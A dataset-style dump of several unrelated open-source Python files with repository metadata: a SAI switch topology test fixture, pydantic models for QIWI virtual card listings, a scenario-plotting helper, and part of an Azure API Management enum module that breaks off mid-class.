665f5dbff8c797cfd55cc0c13b03a77aefdb9977
|
[
"Apache-2.0"
] | 11
|
2021-04-23T05:54:05.000Z
|
2022-03-29T16:37:42.000Z
|
topologies/dc_t1.py
|
andriymoroz/sai-challenger
|
665f5dbff8c797cfd55cc0c13b03a77aefdb9977
|
[
"Apache-2.0"
] | 4
|
2021-06-02T11:05:31.000Z
|
2021-11-26T14:39:50.000Z
|
topologies/dc_t1.py
|
andriymoroz/sai-challenger
|
665f5dbff8c797cfd55cc0c13b03a77aefdb9977
|
[
"Apache-2.0"
] | 14
|
2021-02-27T15:17:31.000Z
|
2021-11-01T10:15:51.000Z
|
from contextlib import contextmanager
import pytest
from sai import SaiObjType
@contextmanager
def config(npu):
topo_cfg = {
"lo_rif_oid": None,
"cpu_port_oid": None,
}
# Create Loopback RIF
lo_rif_oid = npu.create(SaiObjType.ROUTER_INTERFACE,
[
"SAI_ROUTER_INTERFACE_ATTR_VIRTUAL_ROUTER_ID", npu.default_vrf_oid,
"SAI_ROUTER_INTERFACE_ATTR_TYPE", "SAI_ROUTER_INTERFACE_TYPE_LOOPBACK",
"SAI_ROUTER_INTERFACE_ATTR_MTU", "9100"
])
topo_cfg["lo_rif_oid"] = lo_rif_oid
# Get CPU port
cpu_port_oid = npu.get(npu.oid, ["SAI_SWITCH_ATTR_CPU_PORT", "oid:0x0"]).oid()
topo_cfg["cpu_port_oid"] = cpu_port_oid
# Get port HW lanes
for oid in npu.port_oids:
port_lanes = npu.get(oid, ["SAI_PORT_ATTR_HW_LANE_LIST", "8:0,0,0,0,0,0,0,0"]).to_list()
# Remove default VLAN members
vlan_mbr_oids = npu.get_list(npu.default_vlan_oid, "SAI_VLAN_ATTR_MEMBER_LIST", "oid:0x0")
for oid in vlan_mbr_oids:
npu.remove(oid)
# Remove default 1Q bridge members
dot1q_mbr_oids = npu.get_list(npu.dot1q_br_oid, "SAI_BRIDGE_ATTR_PORT_LIST", "oid:0x0")
for oid in dot1q_mbr_oids:
bp_type = npu.get(oid, ["SAI_BRIDGE_PORT_ATTR_TYPE", "SAI_BRIDGE_PORT_TYPE_PORT"]).value()
if bp_type == "SAI_BRIDGE_PORT_TYPE_PORT":
npu.remove(oid)
npu.dot1q_bp_oids.clear()
# Create default routes
npu.create_route("0.0.0.0/0", npu.default_vrf_oid, None,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_DROP"])
npu.create_route("::/0", npu.default_vrf_oid, None,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_DROP"])
# Create Loopback RIF routes
npu.create_route("fe80::5054:ff:fe12:3456/128", npu.default_vrf_oid, cpu_port_oid,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_FORWARD"])
npu.create_route("fe80::/10", npu.default_vrf_oid, cpu_port_oid,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_FORWARD"])
yield topo_cfg
# TODO: TEARDOWN
# Remove default routes
npu.remove_route("fe80::/10", npu.default_vrf_oid)
npu.remove_route("fe80::5054:ff:fe12:3456/128", npu.default_vrf_oid)
npu.remove_route("::/0", npu.default_vrf_oid)
npu.remove_route("0.0.0.0/0", npu.default_vrf_oid)
# Create default 1Q bridge members
for oid in npu.port_oids:
bp_oid = npu.create(SaiObjType.BRIDGE_PORT,
[
"SAI_BRIDGE_PORT_ATTR_TYPE", "SAI_BRIDGE_PORT_TYPE_PORT",
"SAI_BRIDGE_PORT_ATTR_PORT_ID", oid,
# "SAI_BRIDGE_PORT_ATTR_BRIDGE_ID", dot1q_br.oid(),
"SAI_BRIDGE_PORT_ATTR_ADMIN_STATE", "true"
])
npu.dot1q_bp_oids.append(bp_oid)
# Create default VLAN members and set PVID
for idx, oid in enumerate(npu.port_oids):
npu.create_vlan_member(npu.default_vlan_oid, npu.dot1q_bp_oids[idx], "SAI_VLAN_TAGGING_MODE_UNTAGGED")
npu.set(oid, ["SAI_PORT_ATTR_PORT_VLAN_ID", npu.default_vlan_id])
# Remove Loopback RIF
npu.remove(lo_rif_oid)
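# Editorial sketch, not part of the original module: how a test might consume
# this topology context manager; `npu` stands for the NPU object that the
# SAI Challenger test fixtures normally provide.
#   with config(npu) as topo:
#       assert topo["lo_rif_oid"] is not None
#       assert topo["cpu_port_oid"] is not None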
| 40.285714
| 110
| 0.637411
| 0
| 0
| 3,285
| 0.970745
| 3,301
| 0.975473
| 0
| 0
| 1,336
| 0.394799
|
b193f13f0d572526822d816991b5f3105ef56820
| 7,045
|
py
|
Python
|
asynchronous_qiwi/models/QIWIWallet/master_m/list_qvc.py
|
LexLuthorReal/asynchronous_qiwi
|
5847a8d4008493656e973e5283888a4e57234962
|
[
"MIT"
] | 3
|
2021-05-20T02:36:30.000Z
|
2021-11-28T16:00:15.000Z
|
asynchronous_qiwi/models/QIWIWallet/master_m/list_qvc.py
|
LexLuthorReal/asynchronous_qiwi
|
5847a8d4008493656e973e5283888a4e57234962
|
[
"MIT"
] | null | null | null |
asynchronous_qiwi/models/QIWIWallet/master_m/list_qvc.py
|
LexLuthorReal/asynchronous_qiwi
|
5847a8d4008493656e973e5283888a4e57234962
|
[
"MIT"
] | 1
|
2021-11-28T16:00:20.000Z
|
2021-11-28T16:00:20.000Z
|
from loguru import logger
import datetime
from pydantic.fields import ModelField
from typing import Optional, List, Union, Any
from ....utils.tools.str_datetime import convert
from pydantic import BaseModel, Field, validator, ValidationError
from ....data_types.QIWIWallet.list_qvc import ReleasedCardStatus, CardType, CardAlias
class AmountData(BaseModel):
"""Object: \"AmountData\""""
amount: float = Field(..., alias="amount")
currency: str = Field(..., alias="currency")
class Requisites(BaseModel):
name: str = Field(..., alias="name")
value: str = Field(..., alias="value")
class Details(BaseModel):
info: str = Field(..., alias="info")
description: str = Field(..., alias="description")
tariff_link: str = Field(..., alias="tariffLink")
offer_link: str = Field(..., alias="offerLink")
features: List[Any] = Field(..., alias="features")
requisites: List[Union[Requisites]] = Field(..., alias="requisites")
class Info(BaseModel):
id: int = Field(..., alias="id")
name: str = Field(..., alias="name")
alias: Union[str, CardAlias] = Field(..., alias="alias")
price: AmountData = Field(..., alias="price")
period: str = Field(..., alias="period")
type: Union[str, CardAlias] = Field(..., alias="type")
details: Details = Field(..., alias="details")
@validator("alias")
def alias_type(cls, alias: Union[str, CardAlias], field: ModelField) -> CardAlias:
if isinstance(alias, str):
try:
alias = CardAlias(alias)
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return alias
elif isinstance(alias, CardAlias):
return alias
        # pydantic v1 validators should raise ValueError; pydantic wraps it
        # into a ValidationError (ValidationError itself needs an errors list)
        raise ValueError("alias must be a str or CardAlias")
@validator("type")
def card_type_type(cls, card_type: Union[str, CardAlias], field: ModelField) -> CardAlias:
if isinstance(card_type, str):
try:
card_type = CardAlias[card_type]
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return card_type
elif isinstance(card_type, CardAlias):
return card_type
        raise ValueError("type must be a str or CardAlias")
class QVX(BaseModel):
id: int = Field(..., alias="id")
masked_pan: str = Field(..., alias="maskedPan")
status: Optional[Union[str, ReleasedCardStatus]] = Field(..., alias="status")
card_expire: Optional[Union[str, datetime.datetime]] = Field(..., alias="cardExpire")
card_type: Optional[Union[str, CardType]] = Field(..., alias="cardType")
card_alias: str = Field(..., alias="cardAlias")
card_limit: Optional[str] = Field(..., alias="cardLimit")
activated: Optional[Union[str, datetime.datetime]] = Field(..., alias="activated")
sms_resended: Optional[Union[str, datetime.datetime]] = Field(..., alias="smsResended")
post_number: Optional[str] = Field(..., alias="postNumber")
blocked_date: Optional[Union[str, datetime.datetime]] = Field(..., alias="blockedDate")
full_pan: Optional[str] = Field(..., alias="fullPan")
card_id: int = Field(..., alias="cardId")
txn_id: str = Field(..., alias="txnId")
card_expire_month: str = Field(..., alias="cardExpireMonth")
card_expire_year: str = Field(..., alias="cardExpireYear")
@validator('status')
def status_types(cls, status: Union[str, ReleasedCardStatus], field: ModelField) -> ReleasedCardStatus:
if isinstance(status, str):
try:
status = ReleasedCardStatus[status]
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return status
elif isinstance(status, ReleasedCardStatus):
return status
        raise ValueError("status must be a str or ReleasedCardStatus")
@validator('card_expire')
def card_expire_datetime(cls, card_expire: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(card_expire, str):
card_expire = convert(value=card_expire, validator_name=field.name.upper(), alert=False)
return card_expire
elif isinstance(card_expire, datetime.datetime):
return card_expire
elif card_expire is None:
return card_expire
        raise ValueError("card_expire must be a str, datetime or None")
@validator('card_type')
def card_types(cls, card_type: Union[str, CardType], field: ModelField) -> CardType:
if isinstance(card_type, str):
try:
card_type = CardType[card_type]
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return card_type
elif isinstance(card_type, CardType):
return card_type
        raise ValueError("card_type must be a str or CardType")
@validator('activated')
def activated_datetime(cls, activated: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(activated, str):
activated = convert(value=activated, validator_name=field.name.upper(), alert=False)
return activated
elif isinstance(activated, datetime.datetime):
return activated
elif activated is None:
return activated
        raise ValueError("activated must be a str, datetime or None")
@validator('sms_resended')
def sms_resended_datetime(cls, sms_resended: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(sms_resended, str):
sms_resended = convert(value=sms_resended, validator_name=field.name.upper(), alert=False)
return sms_resended
elif isinstance(sms_resended, datetime.datetime):
return sms_resended
elif sms_resended is None:
return sms_resended
        raise ValueError("sms_resended must be a str, datetime or None")
@validator('blocked_date')
def blocked_date_datetime(cls, blocked_date: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(blocked_date, str):
blocked_date = convert(value=blocked_date, validator_name=field.name.upper(), alert=False)
return blocked_date
elif isinstance(blocked_date, datetime.datetime):
return blocked_date
elif blocked_date is None:
return blocked_date
        raise ValueError("blocked_date must be a str, datetime or None")
class ListCard(BaseModel):
qvx: QVX = Field(..., alias="qvx")
balance: Optional[AmountData] = Field(..., alias="balance")
info: Info = Field(..., alias="info")
features: List[Any] = Field(..., alias="features")
class ListCardMaster(BaseModel):
data: List[Union[ListCard]] = Field(..., alias="data")
| 41.686391
| 107
| 0.628957
| 6,695
| 0.950319
| 0
| 0
| 4,255
| 0.603974
| 0
| 0
| 647
| 0.091838
|
b194d8469a9b5649a06d4a8f9eab020579871edb
| 818
|
py
|
Python
|
src/mciso/visualize.py
|
lancechua/mciso
|
2fd406b7c54f9cb6b331ae8ad3470d1f47696494
|
[
"MIT"
] | 2
|
2021-08-06T14:20:37.000Z
|
2022-03-29T16:13:10.000Z
|
src/mciso/visualize.py
|
lancechua/mciso
|
2fd406b7c54f9cb6b331ae8ad3470d1f47696494
|
[
"MIT"
] | null | null | null |
src/mciso/visualize.py
|
lancechua/mciso
|
2fd406b7c54f9cb6b331ae8ad3470d1f47696494
|
[
"MIT"
] | 1
|
2021-08-06T14:21:13.000Z
|
2021-08-06T14:21:13.000Z
|
import matplotlib.pyplot as plt
import pandas as pd
def scenarios_by_product(
X: "np.ndarray", indices: list, products: list, ax: plt.Axes = None
) -> plt.Axes:
"""Plot generated scenarios, with a subplot for each product"""
if ax is None:
_, ax = plt.subplots(X.shape[-1], 1, figsize=(8, X.shape[-1] * 2), sharex=True)
try:
iter(ax)
except TypeError:
ax = [ax]
for i, prod_i in enumerate(products):
pd.DataFrame(
X[:, :, i],
index=indices,
).plot(ax=ax[i], alpha=0.05, linewidth=3, legend=None, color="gray")
pd.DataFrame(X[:, :, i].mean(axis=1), index=indices, columns=["avg"]).plot(
ax=ax[i], alpha=0.8, linewidth=1, legend=None, color="blue"
)
ax[i].set_ylabel(prod_i)
return ax
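# Editorial usage sketch, not part of the original module: plot a few
# random-walk scenarios for two hypothetical products. It assumes X is
# shaped (time, scenario, product), matching the X[:, :, i] indexing above.
if __name__ == "__main__":
    import numpy as np
    X = np.random.normal(size=(24, 50, 2)).cumsum(axis=0)  # 24 periods, 50 scenarios, 2 products
    scenarios_by_product(X, indices=list(range(24)), products=["prod_a", "prod_b"])
    plt.show()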
| 27.266667
| 87
| 0.57335
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 92
| 0.112469
|
b194dd14e51803a9d2a228b8e98a09f53e6b31cf
| 26,160
|
py
|
Python
|
sdk/apimanagement/azure-mgmt-apimanagement/azure/mgmt/apimanagement/models/_api_management_client_enums.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 1
|
2021-09-07T18:39:05.000Z
|
2021-09-07T18:39:05.000Z
|
sdk/apimanagement/azure-mgmt-apimanagement/azure/mgmt/apimanagement/models/_api_management_client_enums.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | null | null | null |
sdk/apimanagement/azure-mgmt-apimanagement/azure/mgmt/apimanagement/models/_api_management_client_enums.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 1
|
2022-03-04T06:21:56.000Z
|
2022-03-04T06:21:56.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum
from six import with_metaclass
from azure.core import CaseInsensitiveEnumMeta
class AccessIdName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
ACCESS = "access"
GIT_ACCESS = "gitAccess"
class AccessType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The type of access to be used for the storage account.
"""
#: Use access key.
ACCESS_KEY = "AccessKey"
#: Use system assigned managed identity.
SYSTEM_ASSIGNED_MANAGED_IDENTITY = "SystemAssignedManagedIdentity"
#: Use user assigned managed identity.
USER_ASSIGNED_MANAGED_IDENTITY = "UserAssignedManagedIdentity"
class AlwaysLog(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Specifies for what type of messages sampling settings should not apply.
"""
#: Always log all erroneous request regardless of sampling settings.
ALL_ERRORS = "allErrors"
class ApiManagementSkuCapacityScaleType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The scale type applicable to the sku.
"""
AUTOMATIC = "Automatic"
MANUAL = "Manual"
NONE = "None"
class ApiManagementSkuRestrictionsReasonCode(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The reason for restriction.
"""
QUOTA_ID = "QuotaId"
NOT_AVAILABLE_FOR_SUBSCRIPTION = "NotAvailableForSubscription"
class ApiManagementSkuRestrictionsType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The type of restrictions.
"""
LOCATION = "Location"
ZONE = "Zone"
class ApimIdentityType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The type of identity used for the resource. The type 'SystemAssigned, UserAssigned' includes
both an implicitly created identity and a set of user assigned identities. The type 'None' will
remove any identities from the service.
"""
SYSTEM_ASSIGNED = "SystemAssigned"
USER_ASSIGNED = "UserAssigned"
SYSTEM_ASSIGNED_USER_ASSIGNED = "SystemAssigned, UserAssigned"
NONE = "None"
class ApiType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Type of API.
"""
HTTP = "http"
SOAP = "soap"
WEBSOCKET = "websocket"
GRAPHQL = "graphql"
class ApiVersionSetContractDetailsVersioningScheme(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""An value that determines where the API Version identifier will be located in a HTTP request.
"""
SEGMENT = "Segment"
QUERY = "Query"
HEADER = "Header"
class AppType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
#: User create request was sent by legacy developer portal.
PORTAL = "portal"
#: User create request was sent by new developer portal.
DEVELOPER_PORTAL = "developerPortal"
class AsyncOperationStatus(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Status of an async operation.
"""
STARTED = "Started"
IN_PROGRESS = "InProgress"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
class AuthorizationMethod(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
HEAD = "HEAD"
OPTIONS = "OPTIONS"
TRACE = "TRACE"
GET = "GET"
POST = "POST"
PUT = "PUT"
PATCH = "PATCH"
DELETE = "DELETE"
class BackendProtocol(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Backend communication protocol.
"""
#: The Backend is a RESTful service.
HTTP = "http"
#: The Backend is a SOAP service.
SOAP = "soap"
class BearerTokenSendingMethod(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
AUTHORIZATION_HEADER = "authorizationHeader"
QUERY = "query"
class BearerTokenSendingMethods(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Form of an authorization grant, which the client uses to request the access token.
"""
#: Access token will be transmitted in the Authorization header using Bearer schema.
AUTHORIZATION_HEADER = "authorizationHeader"
#: Access token will be transmitted as query parameters.
QUERY = "query"
class CertificateConfigurationStoreName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The System.Security.Cryptography.x509certificates.StoreName certificate store location. Only
Root and CertificateAuthority are valid locations.
"""
CERTIFICATE_AUTHORITY = "CertificateAuthority"
ROOT = "Root"
class CertificateSource(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Certificate Source.
"""
MANAGED = "Managed"
KEY_VAULT = "KeyVault"
CUSTOM = "Custom"
BUILT_IN = "BuiltIn"
class CertificateStatus(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Certificate Status.
"""
COMPLETED = "Completed"
FAILED = "Failed"
IN_PROGRESS = "InProgress"
class ClientAuthenticationMethod(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
#: Basic Client Authentication method.
BASIC = "Basic"
#: Body based Authentication method.
BODY = "Body"
class ConfigurationIdName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
CONFIGURATION = "configuration"
class Confirmation(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Determines the type of confirmation e-mail that will be sent to the newly created user.
"""
#: Send an e-mail to the user confirming they have successfully signed up.
SIGNUP = "signup"
#: Send an e-mail inviting the user to sign-up and complete registration.
INVITE = "invite"
class ConnectionStatus(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The connection status.
"""
UNKNOWN = "Unknown"
CONNECTED = "Connected"
DISCONNECTED = "Disconnected"
DEGRADED = "Degraded"
class ConnectivityCheckProtocol(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The request's protocol. Specific protocol configuration can be available based on this
selection. The specified destination address must be coherent with this value.
"""
TCP = "TCP"
HTTP = "HTTP"
HTTPS = "HTTPS"
class ConnectivityStatusType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Resource Connectivity Status Type identifier.
"""
INITIALIZING = "initializing"
SUCCESS = "success"
FAILURE = "failure"
class ContentFormat(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Format of the Content in which the API is getting imported.
"""
#: The contents are inline and Content type is a WADL document.
WADL_XML = "wadl-xml"
#: The WADL document is hosted on a publicly accessible internet address.
WADL_LINK_JSON = "wadl-link-json"
#: The contents are inline and Content Type is a OpenAPI 2.0 JSON Document.
SWAGGER_JSON = "swagger-json"
#: The OpenAPI 2.0 JSON document is hosted on a publicly accessible internet address.
SWAGGER_LINK_JSON = "swagger-link-json"
#: The contents are inline and the document is a WSDL/Soap document.
WSDL = "wsdl"
#: The WSDL document is hosted on a publicly accessible internet address.
WSDL_LINK = "wsdl-link"
#: The contents are inline and Content Type is a OpenAPI 3.0 YAML Document.
OPENAPI = "openapi"
#: The contents are inline and Content Type is a OpenAPI 3.0 JSON Document.
OPENAPI_JSON = "openapi+json"
#: The OpenAPI 3.0 YAML document is hosted on a publicly accessible internet address.
OPENAPI_LINK = "openapi-link"
#: The OpenAPI 3.0 JSON document is hosted on a publicly accessible internet address.
OPENAPI_JSON_LINK = "openapi+json-link"
#: The GraphQL API endpoint hosted on a publicly accessible internet address.
GRAPHQL_LINK = "graphql-link"
class CreatedByType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The type of identity that created the resource.
"""
USER = "User"
APPLICATION = "Application"
MANAGED_IDENTITY = "ManagedIdentity"
KEY = "Key"
class DataMaskingMode(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Data masking mode.
"""
#: Mask the value of an entity.
MASK = "Mask"
#: Hide the presence of an entity.
HIDE = "Hide"
class ExportApi(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
TRUE = "true"
class ExportFormat(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
#: Export the Api Definition in OpenAPI 2.0 Specification as JSON document to the Storage Blob.
SWAGGER = "swagger-link"
#: Export the Api Definition in WSDL Schema to Storage Blob. This is only supported for APIs of
#: Type ``soap``.
WSDL = "wsdl-link"
#: Export the Api Definition in WADL Schema to Storage Blob.
WADL = "wadl-link"
#: Export the Api Definition in OpenAPI 3.0 Specification as YAML document to Storage Blob.
OPENAPI = "openapi-link"
#: Export the Api Definition in OpenAPI 3.0 Specification as JSON document to Storage Blob.
OPENAPI_JSON = "openapi+json-link"
class ExportResultFormat(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Format in which the API Details are exported to the Storage Blob with Sas Key valid for 5
minutes.
"""
#: The API Definition is exported in OpenAPI Specification 2.0 format to the Storage Blob.
SWAGGER = "swagger-link-json"
#: The API Definition is exported in WSDL Schema to Storage Blob. This is only supported for APIs
#: of Type ``soap``.
WSDL = "wsdl-link+xml"
#: Export the API Definition in WADL Schema to Storage Blob.
WADL = "wadl-link-json"
#: Export the API Definition in OpenAPI Specification 3.0 to Storage Blob.
OPEN_API = "openapi-link"
class GrantType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
#: Authorization Code Grant flow as described https://tools.ietf.org/html/rfc6749#section-4.1.
AUTHORIZATION_CODE = "authorizationCode"
#: Implicit Code Grant flow as described https://tools.ietf.org/html/rfc6749#section-4.2.
IMPLICIT = "implicit"
#: Resource Owner Password Grant flow as described
#: https://tools.ietf.org/html/rfc6749#section-4.3.
RESOURCE_OWNER_PASSWORD = "resourceOwnerPassword"
#: Client Credentials Grant flow as described https://tools.ietf.org/html/rfc6749#section-4.4.
CLIENT_CREDENTIALS = "clientCredentials"
class GroupType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Group type.
"""
CUSTOM = "custom"
SYSTEM = "system"
EXTERNAL = "external"
class HostnameType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Hostname type.
"""
PROXY = "Proxy"
PORTAL = "Portal"
MANAGEMENT = "Management"
SCM = "Scm"
DEVELOPER_PORTAL = "DeveloperPortal"
class HttpCorrelationProtocol(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Sets correlation protocol to use for Application Insights diagnostics.
"""
#: Do not read and inject correlation headers.
NONE = "None"
#: Inject Request-Id and Request-Context headers with request correlation data. See
#: https://github.com/dotnet/corefx/blob/master/src/System.Diagnostics.DiagnosticSource/src/HttpCorrelationProtocol.md.
LEGACY = "Legacy"
#: Inject Trace Context headers. See https://w3c.github.io/trace-context.
W3_C = "W3C"
class IdentityProviderType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
#: Facebook as Identity provider.
FACEBOOK = "facebook"
#: Google as Identity provider.
GOOGLE = "google"
#: Microsoft Live as Identity provider.
MICROSOFT = "microsoft"
#: Twitter as Identity provider.
TWITTER = "twitter"
#: Azure Active Directory as Identity provider.
AAD = "aad"
#: Azure Active Directory B2C as Identity provider.
AAD_B2_C = "aadB2C"
class IssueType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The type of issue.
"""
UNKNOWN = "Unknown"
AGENT_STOPPED = "AgentStopped"
GUEST_FIREWALL = "GuestFirewall"
DNS_RESOLUTION = "DnsResolution"
SOCKET_BIND = "SocketBind"
NETWORK_SECURITY_RULE = "NetworkSecurityRule"
USER_DEFINED_ROUTE = "UserDefinedRoute"
PORT_THROTTLED = "PortThrottled"
PLATFORM = "Platform"
class KeyType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The Key to be used to generate token for user.
"""
PRIMARY = "primary"
SECONDARY = "secondary"
class LoggerType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Logger type.
"""
#: Azure Event Hub as log destination.
AZURE_EVENT_HUB = "azureEventHub"
#: Azure Application Insights as log destination.
APPLICATION_INSIGHTS = "applicationInsights"
#: Azure Monitor.
AZURE_MONITOR = "azureMonitor"
class Method(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The HTTP method to be used.
"""
GET = "GET"
POST = "POST"
class NameAvailabilityReason(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Invalid indicates the name provided does not match the resource provider’s naming requirements
(incorrect length, unsupported characters, etc.) AlreadyExists indicates that the name is
already in use and is therefore unavailable.
"""
VALID = "Valid"
INVALID = "Invalid"
ALREADY_EXISTS = "AlreadyExists"
class NotificationName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
#: The following email recipients and users will receive email notifications about subscription
#: requests for API products requiring approval.
REQUEST_PUBLISHER_NOTIFICATION_MESSAGE = "RequestPublisherNotificationMessage"
#: The following email recipients and users will receive email notifications about new API product
#: subscriptions.
PURCHASE_PUBLISHER_NOTIFICATION_MESSAGE = "PurchasePublisherNotificationMessage"
#: The following email recipients and users will receive email notifications when new applications
#: are submitted to the application gallery.
NEW_APPLICATION_NOTIFICATION_MESSAGE = "NewApplicationNotificationMessage"
#: The following recipients will receive blind carbon copies of all emails sent to developers.
BCC = "BCC"
#: The following email recipients and users will receive email notifications when a new issue or
#: comment is submitted on the developer portal.
NEW_ISSUE_PUBLISHER_NOTIFICATION_MESSAGE = "NewIssuePublisherNotificationMessage"
#: The following email recipients and users will receive email notifications when developer closes
#: his account.
ACCOUNT_CLOSED_PUBLISHER = "AccountClosedPublisher"
#: The following email recipients and users will receive email notifications when subscription
#: usage gets close to usage quota.
QUOTA_LIMIT_APPROACHING_PUBLISHER_NOTIFICATION_MESSAGE = "QuotaLimitApproachingPublisherNotificationMessage"
class OperationNameFormat(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The format of the Operation Name for Application Insights telemetries. Default is Name.
"""
#: API_NAME;rev=API_REVISION - OPERATION_NAME.
NAME = "Name"
#: HTTP_VERB URL.
URL = "Url"
class Origin(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The origin of the issue.
"""
LOCAL = "Local"
INBOUND = "Inbound"
OUTBOUND = "Outbound"
class PlatformVersion(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Compute Platform Version running the service.
"""
#: Platform version cannot be determined, as compute platform is not deployed.
UNDETERMINED = "undetermined"
#: Platform running the service on Single Tenant V1 platform.
STV1 = "stv1"
#: Platform running the service on Single Tenant V2 platform.
STV2 = "stv2"
#: Platform running the service on Multi Tenant V1 platform.
MTV1 = "mtv1"
class PolicyContentFormat(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Format of the policyContent.
"""
#: The contents are inline and Content type is an XML document.
XML = "xml"
#: The policy XML document is hosted on a http endpoint accessible from the API Management
#: service.
XML_LINK = "xml-link"
#: The contents are inline and Content type is a non XML encoded policy document.
RAWXML = "rawxml"
#: The policy document is not Xml encoded and is hosted on a http endpoint accessible from the API
#: Management service.
RAWXML_LINK = "rawxml-link"
class PolicyExportFormat(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
#: The contents are inline and Content type is an XML document.
XML = "xml"
#: The contents are inline and Content type is a non XML encoded policy document.
RAWXML = "rawxml"
class PolicyIdName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
POLICY = "policy"
class PolicyScopeContract(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
TENANT = "Tenant"
PRODUCT = "Product"
API = "Api"
OPERATION = "Operation"
ALL = "All"
class PortalRevisionStatus(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Status of the portal's revision.
"""
#: Portal's revision has been queued.
PENDING = "pending"
#: Portal's revision is being published.
PUBLISHING = "publishing"
#: Portal's revision publishing completed.
COMPLETED = "completed"
#: Portal's revision publishing failed.
FAILED = "failed"
class PreferredIPVersion(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The IP version to be used. Only IPv4 is supported for now.
"""
I_PV4 = "IPv4"
class PrivateEndpointConnectionProvisioningState(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The current provisioning state.
"""
SUCCEEDED = "Succeeded"
CREATING = "Creating"
DELETING = "Deleting"
FAILED = "Failed"
class PrivateEndpointServiceConnectionStatus(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The private endpoint connection status.
"""
PENDING = "Pending"
APPROVED = "Approved"
REJECTED = "Rejected"
class ProductState(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""whether product is published or not. Published products are discoverable by users of developer
portal. Non published products are visible only to administrators. Default state of Product is
notPublished.
"""
NOT_PUBLISHED = "notPublished"
PUBLISHED = "published"
class Protocol(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
